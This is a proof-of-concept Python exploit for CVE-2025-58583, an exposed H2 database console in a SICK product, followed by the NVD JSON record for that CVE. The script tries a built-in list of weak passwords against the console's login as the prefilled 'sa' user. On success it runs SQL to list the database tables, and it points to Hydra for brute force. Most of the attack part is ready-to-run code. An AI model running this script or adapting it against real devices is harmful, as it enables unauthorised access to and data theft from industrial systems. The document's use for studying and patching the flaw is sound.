CVE-2025-58583

# CVE-2025-58583 PoC - SICK H2 Database Console Unauthorized Access # This PoC demonstrates how to access the exposed H2 database console import requests import sys from urllib.parse import urljoin TARGET_URL = "http://target-sick-device:8082" # Username is prefilled in the vulnerable application KNOWN_USERNAME = "sa" # H2 default username, may vary by SICK product configuration def try_login(target_url, username, password): """Attempt to login to H2 database console""" login_url = urljoin(target_url, "/login.do") # H2 console login parameters data = { "language": "en", "setting": "Generic+H2+" + username, "name": username, "password": password, "session": "", "url": "jdbc:h2:./cache", "driver": "org.h2.Driver" } try: response = requests.post(login_url, data=data, timeout=10) if response.status_code == 200 and "login.jsp" not in response.url: print(f"[+] Login successful with password: {password}") return True return False except Exception as e: print(f"[-] Error: {e}") return False def execute_sql(target_url, sql_query): """Execute SQL query against the H2 database""" query_url = urljoin(target_url, "/query.do") params = { "sql": sql_query } try: response = requests.get(query_url, params=params, timeout=10) return response.text except Exception as e: print(f"[-] Error executing query: {e}") return None def main(): print(f"[*] Targeting: {TARGET_URL}") print(f"[*] Known username: {KNOWN_USERNAME}") # Common weak passwords to try weak_passwords = ["", "sa", "password", "admin", "123456", "h2", "cache"] for pwd in weak_passwords: if try_login(TARGET_URL, KNOWN_USERNAME, pwd): print("[+] Attempting to enumerate tables...") result = execute_sql(TARGET_URL, "SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='PUBLIC'") print(f"[+] Tables: {result}") break else: print("[-] Could not login with common passwords") print("[*] Consider using brute-force tools like Hydra") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-58583", "sourceIdentifier": "[email protected]", "published": "2025-10-06T07:15:34.890", "lastModified": "2026-01-27T16:14:44.703", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The application provides access to a login protected H2 database for caching purposes. The username is prefilled."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-497"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:sick:enterprise_analytics:*:*:*:*:*:*:*:*", "matchCriteriaId": "04E8EA78-2780-40C0-B5BA-6CF99DE6355B"}]}]}], "references": [{"url": "https://sick.com/psirt", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.cisa.gov/resources-tools/resources/ics-recommended-practices", "source": "[email protected]", "tags": ["US Government Resource"]}, {"url": "https://www.first.org/cvss/calculator/3.1", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "https://www.sick.com/.well-known/csaf/white/2025/sca-2025-0010.json", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.sick.com/.well-known/csaf/white/2025/sca-2025-0010.pdf", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.sick.com/media/docs/9/19/719/special_information_sick_operating_guidelines_cybersecurity_by_sick_en_im0106719.pdf", "source": "[email protected]", "tags": ["Product"]}]}}